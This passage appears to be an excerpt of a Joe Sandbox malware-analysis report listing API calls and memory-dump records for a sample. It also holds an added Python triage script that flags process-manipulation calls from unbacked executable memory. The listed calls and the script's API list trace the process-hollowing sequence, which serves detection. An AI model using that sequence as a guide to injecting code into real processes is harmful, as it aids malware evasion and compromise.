Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: aa4b676205068d97bb7338269f535e3406617771f7c41a13488651f3251121e6
• Instruction ID: 739aed0d3ae3172272b5df176a0d222a102613f5d1ba57f82ac0c0e2410081ea
• Opcode Fuzzy Hash: aa4b676205068d97bb7338269f535e3406617771f7c41a13488651f3251121e6
• Instruction Fuzzy Hash: 7D914BB1D1021ECFDF24CF68C841BAEBBB6BF48310F148569E809A7290DB749995CF91

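The two records above are the most triage-relevant in this part of the listing: the same CreateProcessA call site (ref 07251606) is reached from two overlapping entry points (72513c4 and 72513d0), and it lives in a dump whose source is "based on PE: false", i.e. memory that no image on disk backs. The call's arguments are shown as "?", so the creation flags (for example CREATE_SUSPENDED) cannot be read from this listing; what can be read is "process-creation API called from unbacked memory", which is the trait to pull out when the report has hundreds of such records. The following added example is not part of the Joe Sandbox report or its plugin: it parses records in the shape printed above and flags exactly that pattern, and collapses records that are the same code seen from different entry points. It assumes that the fifth dotted field of the dump file name (00000040 here) can be read as a Win32 page-protection constant, and the set of process-manipulation API names is the editor's own choice.

```python
import re
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant

# Constructed sample, not a file from the report: three records copied in shape from the
# IDA-plugin listing (indentation removed, CFG edge lists cut to their first edges).
SAMPLE = """\
Control-flow Graph
control_flow_graph 452 2b6cff1-2b6d08f GetCurrentProcess 456 2b6d091-2b6d097 452->456
APIs
• GetCurrentProcess.KERNEL32 ref: 02B6D07E
• GetCurrentThread.KERNEL32 ref: 02B6D0BB
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Similarity
• API String ID: 2063062207-0
Control-flow Graph
control_flow_graph 782 72513c4-72513ca 783 72513d1-7251465 782->783
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Similarity
• API String ID: 963392458-0
Control-flow Graph
control_flow_graph 841 72513d0-7251465 844 7251467-7251471 841->844
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Similarity
• API String ID: 963392458-0
"""


@dataclass(frozen=True)
class ApiRef:
    name: str
    module: str
    ref: int  # address of the call site


@dataclass
class FuncRecord:
    start: int          # first basic block listed in control_flow_graph
    apis: tuple         # ApiRef entries from the "APIs" list
    source_file: str
    region_base: int    # "Offset:" field, base of the dumped region
    protect: int        # fifth dotted field of the dump name, read as a page protection (assumption)
    pe_backed: bool     # "based on PE" field
    api_string_id: str


CFG_RE = re.compile(r"^control_flow_graph \d+ ([0-9a-f]+)-", re.M)
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\([^)]*\))?,? ref: ([0-9A-Fa-f]+)", re.M)
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)", re.M)
ASID_RE = re.compile(r"^• API String ID: (\S+)", re.M)


def parse_records(text):
    """Split the listing at each 'Control-flow Graph' heading and parse one record per chunk."""
    records = []
    for chunk in text.split("Control-flow Graph\n")[1:]:
        cfg, src, asid = CFG_RE.search(chunk), SRC_RE.search(chunk), ASID_RE.search(chunk)
        if not (cfg and src and asid):
            continue  # truncated record, like the cut-off one at the end of the listing
        apis = tuple(ApiRef(n, m, int(r, 16)) for n, m, r in API_RE.findall(chunk))
        fields = src.group(1).split(".")
        records.append(FuncRecord(
            start=int(cfg.group(1), 16), apis=apis, source_file=src.group(1),
            region_base=int(src.group(2), 16), protect=int(fields[4], 16),
            pe_backed=(src.group(3) == "true"), api_string_id=asid.group(1)))
    return records


# Editor's choice of APIs that matter when called from memory no PE image backs.
PROCESS_MANIP_APIS = frozenset({
    "CreateProcessA", "CreateProcessW", "WriteProcessMemory", "VirtualAllocEx",
    "NtUnmapViewOfSection", "SetThreadContext", "ResumeThread", "CreateRemoteThread",
})


def triage(records):
    """Return (start, apis, region_base) for process-manipulation calls made from unbacked RWX memory."""
    findings = []
    for r in records:
        hits = tuple(sorted({a.name for a in r.apis} & PROCESS_MANIP_APIS))
        if hits and not r.pe_backed and r.protect & PAGE_EXECUTE_READWRITE:
            findings.append((r.start, hits, r.region_base))
    return findings


def collapse_duplicates(records):
    """Group records sharing an API String ID and the same call-site addresses: one function, several entry points."""
    groups = {}
    for r in records:
        key = (r.api_string_id, tuple(sorted(a.ref for a in r.apis)))
        groups.setdefault(key, []).append(r.start)
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for start, hits, base in triage(recs):
        print(f"func {start:#x} in unbacked RWX region {base:#x}: {', '.join(hits)}")
    for (asid, _refs), starts in collapse_duplicates(recs).items():
        if len(starts) > 1:
            print(f"API String ID {asid} listed {len(starts)}x: {[hex(s) for s in starts]}")
```

Run against the full listing, the GetCurrentProcess/GetCurrentThread, GetModuleHandleW and CreateActCtxA records stay unflagged because none of those APIs manipulates another process, while both CreateProcessA records are flagged and then collapsed to one function. The flag is a prioritisation hint, not proof of hollowing: confirming that needs the creation flags or a later WriteProcessMemory/SetThreadContext/ResumeThread sequence that this part of the listing does not show.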
Control-flow Graph
control_flow_graph 899 2b6ad68-2b6ad77 900 2b6ada3-2b6ada7 899->900 901 2b6ad79-2b6ad86 call 2b6a08c 899->901 902 2b6adbb-2b6adfc 900->902 903 2b6ada9-2b6adb3 900->903 908 2b6ad9c 901->908 909 2b6ad88 901->909 910 2b6adfe-2b6ae06 902->910 911 2b6ae09-2b6ae17 902->911 903->902 908->900 954 2b6ad8e call 2b6aff0 909->954 955 2b6ad8e call 2b6b000 909->955 910->911 912 2b6ae3b-2b6ae3d 911->912 913 2b6ae19-2b6ae1e 911->913 915 2b6ae40-2b6ae47 912->915 916 2b6ae20-2b6ae27 call 2b6a098 913->916 917 2b6ae29 913->917 914 2b6ad94-2b6ad96 914->908 918 2b6aed8-2b6af98 914->918 919 2b6ae54-2b6ae5b 915->919 920 2b6ae49-2b6ae51 915->920 922 2b6ae2b-2b6ae39 916->922 917->922 949 2b6afa0-2b6afcb GetModuleHandleW 918->949 950 2b6af9a-2b6af9d 918->950 923 2b6ae5d-2b6ae65 919->923 924 2b6ae68-2b6ae71 call 2b6a0a8 919->924 920->919 922->915 923->924 930 2b6ae73-2b6ae7b 924->930 931 2b6ae7e-2b6ae83 924->931 930->931 932 2b6ae85-2b6ae8c 931->932 933 2b6aea1-2b6aea5 931->933 932->933 935 2b6ae8e-2b6ae9e call 2b6a0b8 call 2b6a0c8 932->935 936 2b6aeab-2b6aeae 933->936 935->933 939 2b6aeb0-2b6aece 936->939 940 2b6aed1-2b6aed7 936->940 939->940 951 2b6afd4-2b6afe8 949->951 952 2b6afcd-2b6afd3 949->952 950->949 952->951 954->914 955->914
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02B6AFBE
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 4063f03838e0a3d1155d9f12032a4ba46b37b52c4389c82c249c687974a97a93
• Instruction ID: d01505ac821ea1775f8347f072a82a3fac71494867ee183cae8a0ba109e06551
• Opcode Fuzzy Hash: 4063f03838e0a3d1155d9f12032a4ba46b37b52c4389c82c249c687974a97a93
• Instruction Fuzzy Hash: 467149B0A00B058FDB64DF69D04476ABBF2FF48304F10896ED486E7A40DB39E949CB91

Control-flow Graph
control_flow_graph 956 723f8b0-723f8c7 957 723f8d0-723f8d6 956->957 958 723f8c9-723f8ce 956->958 959 723f8d9-723f8dd 957->959 958->959 960 723f8e6-723f8ec 959->960 961 723f8df-723f8e4 959->961 962 723f8ef-723f8f3 960->962 961->962 963 723f917-723f91b 962->963 964 723f8f5-723f912 962->964 965 723f93f-723f94a 963->965 966 723f91d-723f93a 963->966 975 723fb37-723fb40 964->975 968 723f952-723f958 965->968 969 723f94c-723f94f 965->969 966->975 970 723fb43-723fb52 968->970 971 723f95e-723f96e 968->971 969->968 980 723fb54-723fb58 970->980 981 723fb59-723fb5a 970->981 978 723f993-723f9b8 971->978 979 723f970-723f98e 971->979 989 723fb00-723fb05 978->989 990 723f9be-723f9c7 978->990 986 723faf7-723fafa 979->986 980->981 982 723fb61-723fde6 981->982 983 723fb5c-723fb60 981->983 983->982 986->989 986->990 989->970 992 723fb07-723fb0a 989->992 990->970 993 723f9cd-723f9e5 990->993 995 723fb0e-723fb11 992->995 996 723fb0c 992->996 1000 723f9f7-723fa0e 993->1000 1001 723f9e7-723f9ec 993->1001 995->970 999 723fb13-723fb35 995->999 996->975 999->975 1008 723fa10 1000->1008 1009 723fa16-723fa20 1000->1009 1001->970 1003 723f9f2-723f9f5 1001->1003 1003->1000 1005 723fa25-723fa2a 1003->1005 1005->970 1011 723fa30-723fa3f 1005->1011 1008->1009 1009->989 1016 723fa41 1011->1016 1017 723fa47-723fa57 1011->1017 1016->1017 1017->970 1020 723fa5d-723fa60 1017->1020 1020->970 1022 723fa66-723fa69 1020->1022 1023 723fa6b-723fa6f 1022->1023 1024 723faba-723facc 1022->1024 1023->970 1026 723fa75-723fa7b 1023->1026 1024->986 1031 723face-723fae3 1024->1031 1029 723fa7d-723fa83 1026->1029 1030 723fa8c-723fa92 1026->1030 1029->970 1032 723fa89 1029->1032 1030->970 1033 723fa98-723faa4 1030->1033 1038 723fae5 1031->1038 1039 723faeb-723faf5 1031->1039 1032->1030 1040 723faac-723fab8 1033->1040 1038->1039 1039->989 1040->1024
Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: 4'fq
• API String ID: 0-2007657732
• Opcode ID: 577f389b7f825c6832b46c65253dea4d32c4110a33c803c93a0083e0ea8b1e4c
• Instruction ID: 92c5e3d14bd367350194d51c13994215b8938717b531ddab731c54056b8490a8
• Opcode Fuzzy Hash: 577f389b7f825c6832b46c65253dea4d32c4110a33c803c93a0083e0ea8b1e4c
• Instruction Fuzzy Hash: 4FE16EB4E10209DFCB45EFB8D594BAEBBB2FB88300F158069E905A7354DB319D81DB51

Control-flow Graph
control_flow_graph 1068 2b644b4-2b659d9 CreateActCtxA 1071 2b659e2-2b65a3c 1068->1071 1072 2b659db-2b659e1 1068->1072 1079 2b65a3e-2b65a41 1071->1079 1080 2b65a4b-2b65a4f 1071->1080 1072->1071 1079->1080 1081 2b65a60-2b65a90 1080->1081 1082 2b65a51-2b65a5d 1080->1082 1086 2b65a42-2b65a4a 1081->1086 1087 2b65a92-2b65b14 1081->1087 1082->1081 1086->1080 1090 2b659cf-2b659d9 1086->1090 1090->1071 1090->1072
APIs
• CreateActCtxA.KERNEL32(?), ref: 02B659C9
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 2c12c952f39f58b844e42dfc68fef342af352a59f81ed146d1278fdbf954a5eb
• Instruction ID: b695ef2cf0daa13d4e373b4510fc5452338b06b367c6b4367c402e07cf73ff0a
• Opcode Fuzzy Hash: 2c12c952f39f58b844e42dfc68fef342af352a59f81ed146d1278fdbf954a5eb
• Instruction Fuzzy Hash: 5E41C1B0C0071DCBDB24DFA9C988B9EBBB5FF48304F6081AAD408AB251DB756945CF90

                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02B659C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 23de699d388a7486f6a52306b018640a1d3c7a31cad683efb9483bcdf5ba55c4
                                                                                                                                                          • Instruction ID: 1a2a8e957a1625011342d3faf3eb98c81d36822c1ccfdc759d4f3ffd2c140487
                                                                                                                                                          • Opcode Fuzzy Hash: 23de699d388a7486f6a52306b018640a1d3c7a31cad683efb9483bcdf5ba55c4
                                                                                                                                                          • Instruction Fuzzy Hash: 1C41E2B1C00719CBDB24DFA9C984BDEBBB5FF48304F6085AAD408AB251DB756949CF50

                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072511D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: fd7d68d9a20950102fa77ebaa66ca291eccae4a2f4fcedf406c4f38f7d2954c3
                                                                                                                                                          • Instruction ID: d4150f0eec723f419e3cff754350c7df16e86a9c41d9135be5cc9c2c51d7f16d
                                                                                                                                                          • Opcode Fuzzy Hash: fd7d68d9a20950102fa77ebaa66ca291eccae4a2f4fcedf406c4f38f7d2954c3
                                                                                                                                                          • Instruction Fuzzy Hash: EF2139B19103099FDB10CFA9C945BDEBBF5FF48310F10842AE918A7240C778A954DBA1

                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072511D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: dc7825383a39165413d15aa80a68f3749e0a3bae99c0722068fc068442f50607
                                                                                                                                                          • Instruction ID: e5f425aae5ee888d76b0aae22701f34b7a85d631f5b0b8cd68d55922eb161cb5
                                                                                                                                                          • Opcode Fuzzy Hash: dc7825383a39165413d15aa80a68f3749e0a3bae99c0722068fc068442f50607
                                                                                                                                                          • Instruction Fuzzy Hash: 6E212AB191030D9FDB10CFA9C985BDEBBF5FF48310F10842AE918A7240C7789554DBA0
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07250BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 26efb116ec5b07bfac6036e083aaeb2a662b47fa3d74f6879e0386354d6454b3
                                                                                                                                                          • Instruction ID: db56e0589bc0d0c163d3f1819b73bbc6275e4e79d1b2180da27dbd56393467a6
                                                                                                                                                          • Opcode Fuzzy Hash: 26efb116ec5b07bfac6036e083aaeb2a662b47fa3d74f6879e0386354d6454b3
                                                                                                                                                          • Instruction Fuzzy Hash: 062137B6D102098FDB10DFAAC985BEEBBF4AF48324F14842AD459A7241C7789645CFA1
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072512B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: 1a5cd40e482ffc9ca01c626317931f31f80db8c1a72b66a74a729d637ba37446
                                                                                                                                                          • Instruction ID: 25616e9a5a99f554ab3eb27ea436576f589acadf2fccec4114afab28fd5394b2
                                                                                                                                                          • Opcode Fuzzy Hash: 1a5cd40e482ffc9ca01c626317931f31f80db8c1a72b66a74a729d637ba37446
                                                                                                                                                          • Instruction Fuzzy Hash: 2B2136B1D00219DFDB10CFA9C985BEEBBF5FF48320F14842AE958A7250C7389540DBA0
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07250BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 8935128254db0e444545a5a1a0ff559a46b3b287a8bff97b6719fcc66f0b50b6
                                                                                                                                                          • Instruction ID: 1868c702ea713041fdff198557475e4a518ad498d096755eaf1cd5d483b0cfe3
                                                                                                                                                          • Opcode Fuzzy Hash: 8935128254db0e444545a5a1a0ff559a46b3b287a8bff97b6719fcc66f0b50b6
                                                                                                                                                          • Instruction Fuzzy Hash: 3E2129B1D103098FDB20DFAAC985BEEBBF4EF48324F14842AD559A7241C7789945CFA1
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072512B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: 3f324f43d14621554617c40d19f3f2af5f91d4eb16344dcc709d1b73f1c0d74f
                                                                                                                                                          • Instruction ID: 0c4549dd8fefeed4baf635920fd3e66ab9790d539cff172651a9bb3ca36158da
                                                                                                                                                          • Opcode Fuzzy Hash: 3f324f43d14621554617c40d19f3f2af5f91d4eb16344dcc709d1b73f1c0d74f
                                                                                                                                                          • Instruction Fuzzy Hash: 572128B19003599FDB10CFAAC881ADEBBF5FF48320F10842AE918A7250C7789540DBA1
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B6D6D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: 02271d125a0a84f1f76853f3509effed76711556e92aa26041faaf29b5411117
                                                                                                                                                          • Instruction ID: 8ee31b25df79b3348bc3c64840ede8c7f66b0f7957b2ea49cc72fb8773ea2e94
                                                                                                                                                          • Opcode Fuzzy Hash: 02271d125a0a84f1f76853f3509effed76711556e92aa26041faaf29b5411117
                                                                                                                                                          • Instruction Fuzzy Hash: F621E4B59012099FDB10CF9AD984ADEBBF8FB48324F14805AE918A7310C378A944DF64
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B6D6D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: 6988ed942bdc4f541d7c8092b3e74e93b89e4cf1a765919b475746d7ec08cfa0
                                                                                                                                                          • Instruction ID: f32f812c0f0f378079b2c1a9b0ffa0f419889b2b8c5b8c26dcbbee699c2248db
                                                                                                                                                          • Opcode Fuzzy Hash: 6988ed942bdc4f541d7c8092b3e74e93b89e4cf1a765919b475746d7ec08cfa0
                                                                                                                                                          • Instruction Fuzzy Hash: B32112B5D00209DFDB10CFAAD584AEEBBF5FB48324F24845AE918A3310C378A944DF60
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 82e7472aca80414781f222ba472823b46244ef3d4fa5340942e8333a308887a0
• Instruction ID: cfbe6e87185a71658c71c95077aa3cb2f579829d5536ce99e9b66ab19743ecb1
• Opcode Fuzzy Hash: 82e7472aca80414781f222ba472823b46244ef3d4fa5340942e8333a308887a0
• Instruction Fuzzy Hash: 77E180B4E152198FDB60CFA9C980B9DBBF2FB49314F1491AAD818E7345D7319A82CF50

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072510F6
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: ac0616490ef492bb95d9a7232911be6506f318553867b24dfafca0ce4b9f52c3
• Instruction ID: 4965fa50531a23e68bbd52515857ab580cb2cf3e385ff0378d43d9fbec62c4d3
• Opcode Fuzzy Hash: ac0616490ef492bb95d9a7232911be6506f318553867b24dfafca0ce4b9f52c3
• Instruction Fuzzy Hash: 211144B69002498FCB10DFA9C945BEEBBF5EF48324F24881AE919A7250C775A544DFA0

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072510F6
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: a63f9e774d3333b0209a4ad86f693c816571d02f34849cc75ecc5391676e4b3d
• Instruction ID: 459c5576cb0e199e6959405c9728afbc05402abb681f4a554784e3699407f4ba
• Opcode Fuzzy Hash: a63f9e774d3333b0209a4ad86f693c816571d02f34849cc75ecc5391676e4b3d
• Instruction Fuzzy Hash: 9A1167B19002499FCB10DFAAC845BDEBFF5EF88320F20881AE919A7250C775A540DFA0

APIs
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 941b19605e93170242ce70ad2d089f19b96096e847f53c7473c43806312400c5
• Instruction ID: d0c8224334b307aa4df7090c10cc112cd68b4920605e1a13d4d5c07a1d32e685
• Opcode Fuzzy Hash: 941b19605e93170242ce70ad2d089f19b96096e847f53c7473c43806312400c5
• Instruction Fuzzy Hash: B4116AB1D003498FDB24DFAAC8457AEFBF4EF88324F24841AD419A7240C775A540CF90

APIs
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 489fc0a6f9c3dbf56a69f14db6341ec919fcb1757cc1f5028f0e7f163ed3ce02
• Instruction ID: dabdd4b0062980d2b4be86f888fa091e2a15ad276c69040f2adbbb7d37b63505
• Opcode Fuzzy Hash: 489fc0a6f9c3dbf56a69f14db6341ec919fcb1757cc1f5028f0e7f163ed3ce02
• Instruction Fuzzy Hash: 3A113AB1D003498FDB20DFAAC8457AEFBF5EF88324F24841AD519A7240C775A544CF91

APIs
• PostMessageW.USER32(?,?,?,?), ref: 07254A85
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: ee7ec20c01f3396a46d9fa0a86540f39074f46ddf0b000d611fc56bc63487740
• Instruction ID: 5d8a99621b25d33adb492f052f9da44a8e549914057d9b187cba394ed3b0d500
• Opcode Fuzzy Hash: ee7ec20c01f3396a46d9fa0a86540f39074f46ddf0b000d611fc56bc63487740
• Instruction Fuzzy Hash: BD11D4B58103499FDB10DF99C945BDEBBF8EB48324F24841AD958A7600C375A544CFA5

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02B6AFBE
Memory Dump Source
• Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: f0380e167684c57105ed82d8dbd63de8d7676e21dda4ef058bd31987dd09b80a
• Instruction ID: 32e82a03a52043694ba67281a1285d872b558a97a9ab7ded0c4983b703fc072b
• Opcode Fuzzy Hash: f0380e167684c57105ed82d8dbd63de8d7676e21dda4ef058bd31987dd09b80a
• Instruction Fuzzy Hash: B211E0B6C002498FDB10CF9AD548ADEFBF4EF88328F14845AD419B7610C379A545CFA1

APIs
• PostMessageW.USER32(?,?,?,?), ref: 07254A85
Memory Dump Source
• Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: bc298b5dba16607f0b9e3b236982e13141f68fac0e7aeaa08b94e35ab0311fba
• Instruction ID: bfc3d9452c53c4b92a3d9289533dd323ce683878787133ef1bff5635321a0e73
• Opcode Fuzzy Hash: bc298b5dba16607f0b9e3b236982e13141f68fac0e7aeaa08b94e35ab0311fba
• Instruction Fuzzy Hash: DD11D3B58003499FDB10DF9AC985BDEFBF8FB48324F20841AE958A7610C375A584CFA5

Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
Similarity
• API ID:
• String ID: LRfq
• API String ID: 0-2333822924
• Opcode ID: 39ba2cf6f6d0857980b5c5d0ec57887b82dbcb70214b1c693bce70a832476663
• Instruction ID: eb64b3828812dbb820dc8620977c3533316e9d4dd5204467d4262ba424052350
• Opcode Fuzzy Hash: 39ba2cf6f6d0857980b5c5d0ec57887b82dbcb70214b1c693bce70a832476663
• Instruction Fuzzy Hash: 1191E5B4E242099FCB54DFA9C4816ADBBF2FF49310F20856AD819E7345DB319A42CF40

Strings
Memory Dump Source
• Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
Joe Sandbox IDA Plugin
